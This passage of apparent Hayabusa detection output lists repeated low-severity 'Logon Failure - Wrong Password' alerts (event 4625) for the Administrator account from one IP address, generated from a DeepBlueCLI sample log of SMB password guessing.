NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: 